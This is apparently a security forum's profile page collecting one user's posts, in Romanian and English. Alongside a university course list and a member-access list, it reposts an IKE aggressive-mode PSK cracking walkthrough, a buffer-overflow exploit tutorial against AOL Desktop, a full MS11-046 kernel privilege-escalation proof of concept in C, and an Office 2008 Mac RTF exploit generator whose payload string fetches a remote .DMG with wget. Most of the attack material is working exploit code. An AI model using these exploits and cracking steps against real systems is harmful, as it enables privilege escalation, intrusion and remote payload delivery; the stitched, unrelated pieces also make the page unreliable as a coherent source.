Nytro

Administrators
Posts: 18772
Days Won: 730

Everything posted by Nytro

  1. Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
     Kislay Bhardwaj - 1:50 AM

     In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as the response to the initial packet of a VPN client that wants to establish an IPSec tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump, and start a dictionary or brute-force attack against this hash to recover the PSK. This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts, IKE aggressive mode is not very secure.

     It looks like this:

       $ sudo ike-scan 192.168.207.134
       Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
       192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
       Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 0 returned handshake; 1 returned notify

       $ sudo ike-scan -A 192.168.207.134
       Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)
       192.168.207.134 Aggressive Mode Handshake returned
         HDR=(CKY-R=f320d6XXXXXXXX)
         SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
         VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity)
         VID=afcad71368a1XXXXXXXXXXXXXXX (Dead Peer Detection v1.0)
         VID=06e7719XXXXXXXXXXXXXXXXXXXXXX
         VID=090026XXXXXXXXXX (XAUTH)
         KeyExchange(128 bytes)
         ID(Type=ID_IPV4_ADDR, Value=192.168.207.134)
         Nonce(20 bytes)
         Hash(16 bytes)

     To save with some output:

       $ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

     Once you have your psk file to crack you're stuck with two options: psk-crack and Cain. psk-crack is fairly rudimentary to brute force:

       $ psk-crack -b 5 192-168-207-134key
       Running in brute-force cracking mode
       Brute force with 36 chars up to length 5 will take up to 60466176 iterations
       no match found for MD5 hash 5c178d[SNIP]
       Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

     The default charset is "0123456789abcdefghijklmnopqrstuvwxyz"; it can be changed with --charset=

       $ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
       Running in brute-force cracking modde
       Brute force with 63 chars up to length 5 will take up to 992436543 iterations

     To dictionary attack:

       $ psk-crack -d /path/to/dictionary 192-168-207-134key
       Running in dictionary cracking mode
       no match found for MD5 hash 5c178d[SNIP]
       Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)

     You may find yourself wanting a bit more flexibility or options during brute-forcing or dictionary attacking (i.e. character substitution). For this you'll need to use Cain. The problem I ran into was that Cain is a Windows tool and ike-scan is *nix. I couldn't get the Windows tool that is floating around to work. Solution... run in VMware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". It's slow as hell, but more options than psk-crack.

     Source: Kislay Bhardwaj: Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
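As an added example (not part of the original post, and not ike-scan's code), the following Python script shows the condition the article describes from the defender's side: it parses the ISAKMP header and the cleartext payload chain of one IKEv1 packet and flags an aggressive-mode exchange whose HASH payload travels unencrypted, which is exactly what makes the PSK offline-crackable. The two sample packets are constructed in the script rather than captured; cookies and payload bodies are placeholder bytes, with the payload order taken from the ike-scan output above. The same parser, fed the UDP/500 payloads from a capture, would flag every aggressive-mode responder on the wire.

```python
import struct

# ISAKMP header (RFC 2408 section 3.1): initiator cookie, responder cookie, next
# payload, version, exchange type, flags, message ID, total length; 28 bytes.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
# Generic payload header: next payload, reserved, payload length (includes these 4 bytes).
PAYLOAD_HDR = struct.Struct("!BBH")

EXCHANGE_TYPES = {1: "Base", 2: "Main Mode", 3: "Authentication Only",
                  4: "Aggressive", 5: "Informational"}
PAYLOAD_TYPES = {1: "SA", 4: "KE", 5: "ID", 8: "HASH", 10: "NONCE", 13: "VID"}
EXCHANGE_AGGRESSIVE = 4
FLAG_ENCRYPTION = 0x01   # set once the exchange has switched to encrypted payloads


def parse_isakmp(data):
    """Parse one ISAKMP packet into header fields and its cleartext payload chain.
    With the Encryption flag set everything after the header is ciphertext, so
    the chain is not walked (this is the Main Mode case from the article)."""
    if len(data) < ISAKMP_HDR.size:
        raise ValueError("truncated ISAKMP header")
    _icookie, rcookie, nxt, _ver, exch, flags, _msg_id, length = ISAKMP_HDR.unpack_from(data, 0)
    if length != len(data):
        raise ValueError("length field %d does not match packet size %d" % (length, len(data)))
    encrypted = bool(flags & FLAG_ENCRYPTION)
    payloads = []
    if not encrypted:
        off, ptype = ISAKMP_HDR.size, nxt
        while ptype != 0:
            if off + PAYLOAD_HDR.size > len(data):
                raise ValueError("truncated payload header at offset %d" % off)
            nxt, _reserved, plen = PAYLOAD_HDR.unpack_from(data, off)
            if plen < PAYLOAD_HDR.size or off + plen > len(data):
                raise ValueError("bad payload length %d at offset %d" % (plen, off))
            payloads.append((PAYLOAD_TYPES.get(ptype, "type%d" % ptype),
                             data[off + PAYLOAD_HDR.size:off + plen]))
            off, ptype = off + plen, nxt
    return {"responder_cookie": rcookie.hex(),
            "exchange": EXCHANGE_TYPES.get(exch, "unknown(%d)" % exch),
            "exchange_type": exch, "encrypted": encrypted, "payloads": payloads}


def assess(data):
    """Parsed packet plus a finding: hash_in_clear is True when a HASH payload is readable."""
    pkt = parse_isakmp(data)
    pkt["hash_in_clear"] = (not pkt["encrypted"]) and any(n == "HASH" for n, _ in pkt["payloads"])
    if pkt["hash_in_clear"] and pkt["exchange_type"] == EXCHANGE_AGGRESSIVE:
        pkt["finding"] = "aggressive-mode handshake: PSK-derived HASH sent unencrypted (offline-crackable)"
    else:
        pkt["finding"] = "no cleartext PSK hash"
    return pkt


def build_packet(exchange_type, flags, chain=(), ciphertext=b""):
    """Constructed sample builder (not real traffic); chain is [(payload_type, body), ...]."""
    body = b""
    for i, (ptype, pbody) in enumerate(chain):
        following = chain[i + 1][0] if i + 1 < len(chain) else 0
        body += PAYLOAD_HDR.pack(following, 0, PAYLOAD_HDR.size + len(pbody)) + pbody
    body += ciphertext
    first = chain[0][0] if chain else (5 if ciphertext else 0)  # encrypted main-mode msg starts with ID
    hdr = ISAKMP_HDR.pack(b"\x11" * 8, b"\x22" * 8, first, 0x10, exchange_type, flags, 0,
                          ISAKMP_HDR.size + len(body))
    return hdr + body


# Constructed responder reply in aggressive mode, same payload order as the ike-scan
# output above: SA, KE, ID, Nonce, Hash. Bodies are placeholder bytes.
AGGRESSIVE_REPLY = build_packet(EXCHANGE_AGGRESSIVE, 0, [
    (1, b"\x00" * 8),                                         # SA (proposal bytes elided)
    (4, b"\x00" * 128),                                       # KE, 128 bytes for modp1024
    (5, b"\x01\x00\x00\x00" + bytes([192, 168, 207, 134])),   # ID_IPV4_ADDR
    (10, b"\x00" * 20),                                       # Nonce
    (8, b"\x00" * 16),                                        # HASH_R, 16 bytes for MD5
])
# Constructed main-mode message with the encryption flag set: payloads are ciphertext.
MAIN_MODE_ENCRYPTED = build_packet(2, FLAG_ENCRYPTION, ciphertext=b"\xaa" * 40)

if __name__ == "__main__":
    for name, pkt in (("aggressive", AGGRESSIVE_REPLY), ("main mode", MAIN_MODE_ENCRYPTED)):
        r = assess(pkt)
        print(name, r["exchange"], [p for p, _ in r["payloads"]], r["finding"])
```

The length and payload-length checks matter: a detector that trusts the length fields blindly is itself a crash target for malformed UDP/500 datagrams, so every payload is bounded against the packet before it is sliced.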
  2. Exploit writing: A basic Idea.
     Kislay Bhardwaj - 1:59 PM

     Exploit Writing Made Easier With !pvefindaddr

     A few notes before we begin, covering what this paper is about and what it isn't about:
     1. This paper is intended to demonstrate the efficiency of !pvefindaddr.
     2. This paper will not explain the exploit till the end; if you want the full exploit go here: http:// AOL Desktop 9.6 .rtx Buffer Overflow

     Now let's start!

     Required software:
     - Immunity Debugger
     - !pvefindaddr
     - AOL Desktop v9.6

     Required knowledge:
     - Understanding how buffer overflows work.
     - Exploiting techniques.
     - A programming language (I use python).

     I've heard a lot of people complaining about how many apps they must use when writing exploits, or how time consuming some tasks can be if they are not automated, or when trying to test multiple DLLs for SAFESEH or ASLR; that's where !pvefindaddr comes in.

     What is !pvefindaddr!? Well, in short terms, !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need when building an exploit. Here is some helpful information on how to install !pvefindaddr and some basic usage.

     Ok, let us get started! Install AOL Desktop v9.6 (a quick note here: if the app doesn't work properly in Immunity Debugger you will have to close the debugger, issue CTRL+ALT+DELETE -> Processes and stop all AOL related processes, then run the app).

     Now let's make the exploit skeleton (I won't remake the full exploit; if you want to check it out it's at the top of the page). It will contain two standard headers and between them our buffer; let's check it out:

     ****************************************
     #!/usr/bin/python
     # The First Header
     hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
            "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
            "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
            "\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
            "\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
            "\x68\x74\x74\x70\x3a\x2f\x2f")
     # The Second Header
     hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
            "\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
            "\x48\x54\x4d\x4c\x3e\x0d\x0a")
     # The buffer between the headers: 6000 NOPs for the first crash test
     payload = '\x90' * 6000
     exploit = hd1 + payload + hd2
     try:
         file = open('exploit.rtx', 'w')
         file.write(exploit)
         file.close()
         print 'File created, time to PEW PEW!\n'
     except:
         print 'Something went wrong!\n'
         print 'Check if you have permissions to write in that folder, or if the folder exists!'
     ****************************************

     Generate the file using the exploit and after that open it in AOL Desktop, and as we can see we could overwrite EIP with our '\x90's:

     So what would be next? Calculating the exact offset until the EIP overwrite. (NOTE: Before we go on, restart AOL and attach it again.) In our debugger we can either click on the PyCommands button and select !pvefindaddr from the list and then enter the arguments, or we can do this directly by entering !pvefindaddr and the arguments in the command bar at the bottom of the debugger, like this:

     As you can see it said "check mspattern.txt", so we go in the Immunity Debugger folder and open up mspattern.txt, copy the pattern into our exploit and regenerate the malicious file.

     After opening the malicious file containing our pattern: we can see that our EIP is 35784734 and we also can see that ESI points into our buffer. Now, in order to determine the exact offset, we will use another feature from !pvefindaddr. Normally with Metasploit we would try pattern_offset EIP now; well, with !pvefindaddr we can actually get more info, let's try the findmsp function. After it is done just open the Log window and, as we can see, we have some nice information:

     So it found the first characters from the pattern in davclnt.dll, then it checked register addresses: we have the EIP overwrite address beginning at 5384 and the register that points into the pattern with the instruction CALL DWORD[ESI+10] (if you check) at 5368; it even checked the SEH chains to see if it finds the pattern there, and we also have the "Walking stack" which, if you haven't guessed by now, actually tells us when the ESP contains a pointer to our buffer at the position 4360.

     This is a nice feature but we have one that does even better: !pvefindaddr also has a function that runs a findmsp and after that, based on the results and on the stack, it actually gives us information about the type of exploit and how it should be made. Let's check it out:

     !pvefindaddr suggest

     Sweet huh? Now we have the exact offset before the EIP overwrite, we know that ESI points to our buffer; the next normal step would be to get the value of ESI into EIP with a JMP ESI, CALL ESI, etc. Now these are simple instructions, we can find them, but what if we want to find these instructions without null bytes, from specific modules, etc.? (NOTE: I'm not saying this can't be done manually, only saying that it will take more time and this way it's much easier.)

     Let's say we want to make this exploit using a universal address (like the original exploit). Searching for this instruction can take a lot of time, mostly because it's a very common instruction, but using !pvefindaddr we can actually search for every JMP ESI instruction from some specific modules and with some specific characteristics. We will use !pvefindaddr to give us a list of all modules and their characteristics; once we have done this we can view all the modules that the app uses and see which have SAFESEH, ASLR, etc.:

     Once we can see which modules we can use we can start searching for the specific instruction using the command:

     !pvefindaddr j -r ESI -n -o

     (this might take some time, go get a beer or something.) This function searches for pointers that jump to a specific register (ESI in our case); the most common use of this function is when dealing with direct EIP overwrite. The function will look for any instructions like JMP ESI, CALL ESI combination from non-fixup and non-ASLR modules; also the -n flag will not show pointers that contain null bytes and the -o flag will exclude the pointers in the OS modules (we want to make it universal). After a little search we find a nice instruction at 20C5CFC0 from aolusershell.dll; this one should work perfectly.

     After we are done we can also use compare in order to compare some bytes (usually our shellcode) from a file with some bytes in memory; it also compares unicode-expanded instances. Ok, now we need to make our shellcode binary (only the shellcode); we can just take the RAW output from Metasploit when making a payload and pipe it to a file like:

     msfpayload windows/exec CMD=calc.exe R > shellcode

     There is also a nice perl script that shows you how to do it on the !pvefindaddr wiki:

     ****************************************
     my $shellcode="\xcc\xcc\xcc\xcc"; #paste your shellcode here
     open(FILE,">c:\\temp\\shellcode.bin");
     binmode FILE;
     print FILE $shellcode;
     close(FILE);
     ****************************************

     We then run the whole exploit (with the shellcode included, without any breakpoints or anything); now that the app has crashed we compare it:

     !pvefindaddr compare C:\shellcode

     After it is finished we can either view the Log window or open compare.txt from the Immunity Debugger folder:

     Now a quick review on what we managed to do in this tutorial:
     - We have determined the exact offset before EIP gets overwritten and also a register that points to our buffer.
     - We have found our type of exploit, and some information on how to structure it.
     - Found out which modules have SAFESEH, ASLR or get rebased.
     - Found the instruction we needed, avoiding these modules and the OS modules as well.
     - Checked if our shellcode contains bad characters.

     So as you can see we did all the above with just !pvefindaddr and we also managed to save a good amount of time.

     Source: Kislay Bhardwaj: Exploit writing: A basic Idea.
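The offset arithmetic the article hands to !pvefindaddr's findmsp (and to Metasploit's pattern_offset) is small enough to reproduce, so here it is as an added example that is not part of the original post or of either tool: a Metasploit-style cyclic pattern generator and an offset finder. Fed the EIP value 35784734 quoted above, it returns 5384, the same offset the article reports, which is a useful sanity check when triaging a crash. Function names are my own.

```python
import string
import struct

UPPER, LOWER, DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Metasploit-style cyclic pattern: each 3-byte triple (upper, lower, digit) is
    unique, so any 4-byte window identifies one position up to 20280 bytes."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out += (u + l + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than %d bytes is not unique" % len(out))


def pattern_offset(value, length=20280):
    """Locate a crashed register's value inside the pattern. `value` is either the
    integer read from the debugger (held little-endian in memory) or the raw bytes.
    Returns the byte offset, or None when the register is not under our control."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    pat = pattern_create(length)
    idx = pat.find(needle)
    if idx < 0:
        # pattern_offset also tries the byte-reversed form for big-endian captures
        idx = pat.find(needle[::-1])
    return idx if idx >= 0 else None


if __name__ == "__main__":
    # 6000 bytes is the buffer size used by the skeleton above
    print(pattern_offset(0x35784734, 6000))  # 5384, matching the article
```

The 5384 comes out of the pattern's structure: 0x35784734 stored little-endian is the ASCII "4Gx5", and triple "Gx4" is the 1794th triple, so its digit sits at 1794*3 + 2 = 5384.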
  3. Computer Science at university:
     Year I, semester I:
     - Procedural programming (the C language)
     - Mathematical logic (Boolean bullshit, rubbish)
     - Algebra (crap)
     - Analysis (even bigger crap)
     - Algorithms and data structures (sorting, trees, useful)
     - Computer architecture (what a processor looks like, interesting, ASM lab, useful)
     Year I, semester II:
     - Object-oriented programming (C++, important)
     - Analysis II (crap)
     - Algebra II (crap)
     - Graph algorithms (too theoretical, lame)
     - Geometry (crap as well)
     - Formal languages and automata (not really sure what it's about)
     Year II, semester I:
     - web techniques: HTML, CSS and Javascript (practical)
     - computational geometry (kind of theoretical, I think)
     - computability and complexity (optimizations, useful)
     - advanced programming techniques (Java, very useful)
     - operating systems (Linux, C++ under Linux, really cool)
     - probability (not sure exactly, I think it's math, so lame)
     Year II, semester II:
     - statistics (good teacher, rubbish otherwise)
     - computer networks (Java sockets, RMI and serialization, useful)
     - software development methods (rubbish where you need some project or other)
     - artificial intelligence (not sure exactly, Prolog lab)
     - logic programming (lame prof, Maude lab, a weird but interesting language)
     - databases (theory in lectures, Oracle lab)
     That's about it for now; if you want other information, ask.
  4. begood: Is it OK like this? Is that the ID? Nemessis: We have access to the database, I don't think there will be problems. Anyway, most of us know each other. Or let's just bloody have a meeting ourselves...
  5. SecureCRT.
  6. Sorry, access:
     - 3871 = Nytro
     - 989 = Zatarra
     - 21017 = pyth0n3
     - 13607 = begood
     - 15061 = MrRip
     - 1 = []kw3rln
     - 528 = Nemessis
     - 1348 = Ahead
     - 22232 = wildchild
     - 22968 = tex
     Also, the private messages of those with access cannot be seen (that's how it should be). If anyone else wants access, contact me. If there's any problem, or if you want something extra, say so.
  7. MS11-046 Afd.sys Proof of Concept

     /*
     MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S .
     Ronnie Johndas wrote the writeup dissecting a malware with this exploit .
     I Rahul Sasi(fb1h2s) just made the POC exploit available .
     Reference: ms8-66, ms6-49
     *************************************************************
     Too lazy to add the shellcode , you could steel this one, it should work .
     http://www.whitecell.org/list.php?id=50
     The shell code to acheive privilage esclation as per the article used the following steps
     http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf .
     1) Use PslookupProcessId get system token
     2) Replace it with the current process token, and we are system
     *************************************************************
     */

     #define SystemModuleInformation 11

     #ifndef WIN32_LEAN_AND_MEAN
     #define WIN32_LEAN_AND_MEAN
     #endif

     #ifndef _WIN32_WINNT //For XP Only
     #define _WIN32_WINNT 0x0501
     #endif

     // We have a client sock conencting to 135 considering the fact it's open by default
     #define DEFAULT_ADDR "127.0.0.1"
     #define DEFAULT_PORT "135"

     #include <windows.h>
     #include <winsock2.h>
     #include <ws2tcpip.h>
     #include <stdio.h>
     #include <stdlib.h>   // malloc, free, exit
     #include <string.h>   // strstr, memset, memcpy
     #include <iphlpapi.h>

     #pragma comment(lib, "Ws2_32.lib")
     #pragma comment(lib, "ntdll.lib")

     //lets make a nop ret sandwitch
     unsigned char hexcode[] = "\x90\x90\x90\xcc\x90\x90\x90\x90";
     /*
     The shell code to acheive privilage esclation
     Add you shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
     the malware used the following method.
     1) Use PslookupProcessId get system token
     2) Replace it with the current process token, and we are system
     */

     // he gets the above sandwitch
     LPVOID hexcode_addr = (LPVOID)0x00000000;
     DWORD sizeofshell = 0x1000;
     // he gets the haldispatch
     ULONG_PTR HalDispatchTable;
     //Holds the base adress of krnl
     PVOID krl_base;
     //load adress of those %krnl%.exe dudes
     HMODULE krl_addr;

     // structure system_module_info data
     typedef struct _SYSTEM_MODULE_INFORMATION {
         ULONG Reserved[2];
         PVOID Base;
         ULONG Size;
         ULONG Flags;
         USHORT Index;
         USHORT Unknown;
         USHORT LoadCount;
         USHORT ModuleNameOffset;
         CHAR ImageName[256];
     } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

     //sock addrinfo
     struct addrinfo *result = NULL, *ptr = NULL, hints;

     // The list of loaded drivers
     typedef LONG NTSTATUS, *PNTSTATUS;
     NTSTATUS NTAPI ZwQuerySystemInformation(
         IN ULONG SystemInformationClass,
         IN PVOID SystemInformation,
         IN ULONG SystemInformationLength,
         OUT PULONG ReturnLength);

     typedef enum _KPROFILE_SOURCE {
         ProfileTime, ProfileAlignmentFixup, ProfileTotalIssues, ProfilePipelineDry,
         ProfileLoadInstructions, ProfilePipelineFrozen, ProfileBranchInstructions,
         ProfileTotalNonissues, ProfileDcacheMisses, ProfileIcacheMisses, ProfileCacheMisses,
         ProfileBranchMispredictions, ProfileStoreInstructions, ProfileFpInstructions,
         ProfileIntegerInstructions, Profile2Issue, Profile3Issue, Profile4Issue,
         ProfileSpecialInstructions, ProfileTotalCycles, ProfileIcacheIssues,
         ProfileDcacheAccesses, ProfileMemoryBarrierCycles, ProfileLoadLinkedIssues,
         ProfileMaximum
     } KPROFILE_SOURCE, *PKPROFILE_SOURCE;

     typedef DWORD (WINAPI *PNTQUERYINTERVAL)(KPROFILE_SOURCE ProfileSource, PULONG Interval);

     typedef NTSTATUS (WINAPI *PNTALLOCATE)(
         IN HANDLE ProcessHandle,
         IN OUT PVOID *BaseAddress,
         IN ULONG ZeroBits,
         IN OUT PULONG RegionSize,
         IN ULONG AllocationType,
         IN ULONG Protect);

     int main()
     {
         //All the declarations goes here
         PNTQUERYINTERVAL ZwQueryIntervalProfile;
         PNTALLOCATE ZwAllocateVirtualMemory;
         KPROFILE_SOURCE stProfile = ProfileTotalIssues;
         ULONG Ret_size;
         NTSTATUS status, alloc_status;
         ULONG i, n, *q;
         PSYSTEM_MODULE_INFORMATION p;
         void *base;
         WSADATA wsaData;
         SOCKET ConnectSocket = INVALID_SOCKET;
         int iResult;
         DWORD ibuf[0x30];
         DWORD obuf[0x30];
         ULONG interval; // output of ZwQueryIntervalProfile (named so it does not shadow the global addrinfo *result)

         hints.ai_family = AF_UNSPEC;
         hints.ai_socktype = SOCK_STREAM;
         hints.ai_protocol = IPPROTO_TCP;

         printf("\n [+] MS11-046 Exploit by fb1h2s(Rahul Sasi) ");
         /*
         MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S .
         Ronnie Johndas wrote the writeup dissecting a malware with the exploit details .
         I Rahul Sasi(fb1h2s) just made the POC exploit available .
         Reference: ms8_66, ms6_49
         http://www.whitecell.org/list.php?id=50 exp codes
         */

         status = ZwQuerySystemInformation(SystemModuleInformation, &n, 0, &n);
         q = (ULONG *)malloc(n * sizeof(*q));
         if (q == NULL) {
             perror("malloc");
             return -1;
         }
         status = ZwQuerySystemInformation(SystemModuleInformation, q, n * sizeof(*q), NULL);
         p = (PSYSTEM_MODULE_INFORMATION)(q + 1);
         base = NULL;

         // Loop Loop The table and check for our krl
         for (i = 0; i < *q; i++) {
             if (strstr(p[i].ImageName, "ntkrnlpa.exe")) {
                 printf("\n [+] Yo Yo found, and am In ntkrnlpa.exe \n");
                 krl_addr = LoadLibraryExA("ntkrnlpa.exe", 0, 1);
                 printf("\t Base: 0x%x size: %u\t%s\n", p[i].Base, p[i].Size, p[i].ImageName);
                 krl_base = p[i].Base;
                 break;
             } else if (strstr(p[i].ImageName, "ntoskrnl.exe")) {
                 printf("\n [+] Yo Yo found, and am In ntoskrnl.exe\n");
                 krl_addr = LoadLibraryExA("ntoskrnl.exe", 0, 1);
                 printf("\t Base Adress: 0x%x ", p[i].Base);
                 krl_base = p[i].Base;
                 break;
             } else {
                 printf("\n [+]Cdnt find, and am out\n");
                 exit(0);
             }
         }
         free(q);

         printf("\n[+] Continue with Exploitation\n");
         HalDispatchTable = (ULONG_PTR)GetProcAddress(krl_addr, "HalDispatchTable");
         if (!HalDispatchTable) {
             printf("[!!] Sh*t happen with HalDispatchTable\n");
             return FALSE;
         }
         printf("\tBase Nt=: 0x%x ", krl_base);
         // rebase the user-mode image address onto the real kernel base
         HalDispatchTable -= (ULONG_PTR)krl_addr;
         HalDispatchTable += (ULONG_PTR)krl_base;
         printf("\n[+] HalDispatchTable found \t\t\t [ 0x%p ]\n", HalDispatchTable);

         printf("[+] ZwQueryIntervalProfile ");
         ZwQueryIntervalProfile = (PNTQUERYINTERVAL)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQueryIntervalProfile");
         if (!ZwQueryIntervalProfile) {
             printf("[!!] Sh*t happen resolving ZwQueryIntervalProfile\n");
             return FALSE;
         }
         printf("\t\t\t [ 0x%p ]\n", ZwQueryIntervalProfile);

         printf("[+] ZwAllocateVirtualMemory");
         ZwAllocateVirtualMemory = (PNTALLOCATE)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwAllocateVirtualMemory");
         if (!ZwAllocateVirtualMemory) {
             printf("[!!] Unable to resolve ZwAllocateVirtualMemory\n");
             return FALSE;
         }
         printf("\t\t\t [ 0x%p ]\n", ZwAllocateVirtualMemory);

         printf("\n[+] Allocating memory at [ 0x%p ]...\n", hexcode_addr);
         alloc_status = ZwAllocateVirtualMemory(INVALID_HANDLE_VALUE, &hexcode_addr, 0, &sizeofshell,
                                                MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
         printf("\n[+] status %p.\n", alloc_status);
         if (alloc_status != 0) {
             printf("[-] Sh*t happen with NtAllocateVirtualMemory() , %#X\n", alloc_status);
         }
         printf("\t\tZwAllocateVirtualMemory() Allocated return Status, %#X\n", alloc_status);
         memset(hexcode_addr, 0x90, sizeofshell);
         memcpy((void *)((BYTE *)hexcode_addr + 0x100), (void *)hexcode, sizeof(hexcode));

         iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
         if (iResult != 0) {
             printf("WASUP Failed: %d\n", iResult);
             return 1;
         }
         iResult = getaddrinfo(DEFAULT_ADDR, DEFAULT_PORT, &hints, &result);
         ptr = result;

         // SOCKET for connecting to localhost at 135
         ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol);
         if (ConnectSocket == INVALID_SOCKET) {
             printf("[-] This is bad , Socket Error : %ld\n", WSAGetLastError());
             freeaddrinfo(result);
             WSACleanup();
             return 1;
         }

         // Connect to server.
         iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
         if (iResult == SOCKET_ERROR) {
             closesocket(ConnectSocket);
             ConnectSocket = INVALID_SOCKET;
             printf("[+]Unable to connect to server, modify code and add a server socket, and connect to it!\n");
             WSACleanup();
             return 1;
         } else {
             printf("[+]Hola Connected to server !\n");
         }

         memset(ibuf, 0x90, sizeof(ibuf));
         memset(obuf, 0x90, sizeof(obuf));
         DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf, sizeof(ibuf), (LPVOID)obuf, 0, &Ret_size, NULL);
         for (i = 0; i < sizeof(hints); i++) {
             printf(" %02X ", (unsigned char)obuf[i]);
         }
         printf("\n\n[+] Overwriting HalDispatchTable with those bytes...");
         DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf, sizeof(ibuf), (LPVOID)HalDispatchTable, 0, &Ret_size, NULL);
         printf("\n\n[+] This should work and break...");
         ZwQueryIntervalProfile(stProfile, &interval);
         return 0;
     }

     Source: MS11-046 Afd.sys Proof of Concept
  8. Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service
     Source: http://www.securityfocus.com/bid/52735/info

     Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.

     The following Wireshark versions are vulnerable:
     1.4.0 through 1.4.11
     1.6.0 through 1.6.5

     PoC: http://www.exploit-db.com/sploits/18758.pcap

     Source: Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service
  9. Office 2008 sp0 RTF Pfragments MAC exploit

     #!/usr/bin/python
     #RTF Pfragments exploit for MAC office 2008
     #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
     #Advanced Hacking Trainings - http://training.aslitsecurity.com
     #Web - http://www.aslitsecurity.com/
     #Blog - http://www.aslitsecurity.blogspot.com/
     #Office 2007 for MC SP 0

     myfile = (
         "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b"
         "\x5c\x73\x6e\x20\x70\x46\x72\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b"
         "\x5c\x73\x76\x20\x39\x3b\x32\x3b\x31\x31\x31\x31\x31\x31\x31\x31"
         "\x37\x35\x30\x30\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
         "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
         "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
         "f069837c"  # call esp
         "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31"
         "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31"
         "\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x62\x61\x30\x30"
         "\x30\x30\x35\x30\x30\x30\x36\x36\x38\x31\x63\x61\x66\x66\x30\x66"
         "\x34\x32\x35\x32\x36\x61\x30\x32\x35\x38\x63\x64\x32\x65\x33\x63"
         "\x30\x35\x35\x61\x37\x34\x65\x66\x62\x38\x37\x30\x36\x39\x36\x65"
         "\x36\x37\x38\x62\x66\x61\x61\x66\x37\x35\x65\x61\x61\x66\x37\x35"
         "\x65\x37\x35\x37\x63\x33\x7d\x7d\x7d\x7d"
     )
     sign = ("\x70\x69\x6e\x67\x70\x69\x6e\x67")
     shellcode = "\xCC\xCC\xCC\xCC"
     shellcode += "http://www.site.com/payload.DMG"
     shellcode += "\x11\x3A\x65\x89\x11\x3A\x65\x89\x11\x3A\x65\x89"  # ("wget http://")
     shellcode += "wget "
     shellcode += "\x1A\x18\x19\x02"
     exploit = open("output.doc", mode="wb")
     exploit.write(myfile + sign + shellcode)
     exploit.close()
     print "Done"

     Source: Office 2008 sp0 RTF Pfragments MAC exploit
  10. Adobe Flash Player ActionScript Launch Command Execution Vulnerability

     ##
     # This file is part of the Metasploit Framework and may be subject to
     # redistribution and commercial restrictions. Please see the Metasploit
     # web site for more information on licensing and terms of use.
     # http://metasploit.com/
     ##

